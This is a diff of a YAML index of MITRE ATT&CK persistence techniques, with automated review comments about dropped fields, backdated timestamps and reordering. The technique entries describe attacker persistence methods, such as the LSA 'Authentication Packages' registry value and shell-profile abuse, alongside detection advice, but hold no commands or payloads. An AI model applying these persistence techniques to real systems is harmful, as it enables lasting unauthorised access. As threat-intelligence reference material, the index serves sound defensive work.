@@ -33813,13 +34224,11 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
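Review bot: T1505.004 loses `x_mitre_attack_spec_version: 2.1.0` together with `spec_version`, and nothing re-adds it, whereas other older objects in this diff keep the field (T1547.002 and T1543.001 retain `x_mitre_attack_spec_version: 2.1.0` as unchanged context below). If the generator is meant to emit the field wherever the source has it, the source object for T1505.004 is missing it and the index becomes inconsistent about which objects carry an ATT&CK spec version; check it against the upstream object rather than merging as-is.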
@@ -33872,8 +34281,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -33921,78 +34330,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
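Review bot: this hunk deletes some 67 lines of T1546.004 (platforms, domains, contributors, id, type, created, the whole `external_references` list), but nearly all of it is re-emitted later in the object in the following hunks, so the real changes for this technique are the `modified` timestamp (`2022-04-25` to `2024-09-25`), the now explicit `x_mitre_deprecated` and `revoked` flags and one reference URL. Key order in the output evidently follows the source object's order; sorting keys (and `external_references` entries) in the generator would keep regenerated diffs to the lines that actually changed and make reviews like this one tractable.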
@@ -34040,6 +34382,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -34050,9 +34396,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -34061,8 +34411,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1547.002:
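Review bot: the one substantive reference change in this block is `bencane blog bashrc`, whose `url` now points to a `web.archive.org` snapshot of the original post and whose Retrieved date is updated to September 25, 2024; the other entries are the same references with `description` now emitted before `url` and in a different order, plus `url` and `external_id` swapped on the `mitre-attack` entry. `revoked: false` is new on this object; anything treating a missing `revoked` as false is unaffected, but confirm consumers tolerate the extra key. Otherwise the re-added block matches what the earlier hunk removed (same contributors, same descriptions).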
@@ -34099,7 +34508,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -34122,12 +34531,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -34205,41 +34613,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -34248,27 +34626,54 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
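Review bot: `x_mitre_permissions_required` (`Administrator`, `User`) is removed from T1137.004 and not re-added anywhere, while `x_mitre_attack_spec_version` goes from `2.1.0` to `3.2.0` and `x_mitre_version` from `1.1` to `1.2`. Objects that were not refreshed upstream still carry the field in this file (T1547.002 at `- Administrator` and T1543.001 at `- User` appear as unchanged context below), so after this change the index is inconsistent about whether permissions are recorded per technique. If the field has been retired in the newer ATT&CK spec, consumers that read it should be checked and the remaining occurrences will only disappear as those objects are updated; if not, this is data loss. The same removal happens for T1556.001 and T1556.005 later in the diff. The `modified` change for T1574.009 at the end of the hunk is another backwards move (`2023-05-09` to `2023-03-30`).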
@@ -34329,7 +34734,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -34373,7 +34777,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -34395,7 +34799,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -34476,7 +34879,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -34499,7 +34901,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -34529,12 +34931,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
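Review bot: T1037.003 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` here with no replacement, the same pattern as T1505.004 above, and its `modified` in the preceding hunk goes back from `2021-04-29` to `2020-03-24`. For a technique whose other fields are untouched, a `modified` more than a year older plus a missing attack spec version reads like the object was taken from an older export; please confirm which bundle version the generator consumed. The T1197 `modified` change at the end of this hunk is another backwards move.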
@@ -34624,12 +35024,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34714,7 +35113,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -34779,18 +35177,17 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
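Review bot: the `Azure AD` to `Entra ID` edit in the T1556.009 description is a content change (the vendor rename, matching the `Identity Provider` platform value introduced elsewhere in this diff) and its `x_mitre_version` bump to `1.1` sits in the next hunk; anything that matches on the old product name in description text should be updated alongside. The `spec_version` removal for T1546.002 at the top is the same pattern as the rest of the file.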
@@ -34823,10 +35220,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
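Review bot: the platform change for T1556.009 is not a pure rename: `Azure AD` maps to `Identity Provider` as elsewhere, but `SaaS` is also dropped while `IaaS` stays, so the technique now appears under one fewer platform. If that narrowing is what the upstream object says, fine, but it means any SaaS-scoped view built from this index loses the technique; double-check it against the source rather than assuming it is part of the rename.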
@@ -34863,7 +35259,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -34937,7 +35332,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34965,12 +35360,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -35029,33 +35423,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -35076,6 +35447,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -35090,52 +35462,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
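Review bot: `x_mitre_permissions_required: - Administrator` is dropped from T1556.001 without replacement, the same field loss flagged on T1137.004. Separately, the diff here interleaves two objects: the removed `atomic_tests: []` / `T1556.005:` / `technique:` lines and T1556.005's old header and reference list are re-emitted further down, so the minus lines for the T1556.005 references are a reorder, not deletions, and the `modified` for T1556.005 moves forward to `2024-08-26`. A reviewer reading only this hunk would conclude T1556.005 lost its references, which argues again for stable key and reference ordering in the generator.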
@@ -35157,6 +35519,7 @@ persistence:
phase_name: defense-evasion
